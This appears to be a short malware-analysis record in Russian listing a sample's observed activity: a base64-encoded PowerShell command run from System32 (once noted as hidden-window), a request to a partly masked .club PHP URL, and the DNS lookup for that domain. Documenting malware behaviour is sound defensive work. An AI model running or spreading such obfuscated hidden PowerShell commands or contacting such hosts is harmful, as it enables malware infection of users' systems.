Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABzADkAMwAzADQAXwA4AD0AJwBiADIANgAwADYAOAAzADYAJwA7ACQAZAA5ADMANQA0ADMAXwAgAD0AIAAnADgAMwA4ACcAOwAkAGwAMAAzADMANwAyADQANAA9ACcATwA5ADEAMwAwADMANgBfACcAOwAkAGYANwA3ADQANAA4AD0AJABlAG4AdgA...
- http://ss###ah69.club/skoex/po2.php?l=#########
- DNS ASK ss###ah69.club
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABzADkAMwAzADQAXwA4AD0AJwBiADIANgAwADYAOAAzADYAJwA7ACQAZAA5ADMANQA0ADMAXwAgAD0AIAAnADgAMwA4ACcAOwAkAGwAMAAzADMANwAyADQANAA9ACcATwA5ADEAMwAwADMANgBfACcAOwAkAGYANwA3ADQANAA4AD0AJABlAG4AdgA...' (со скрытым окном)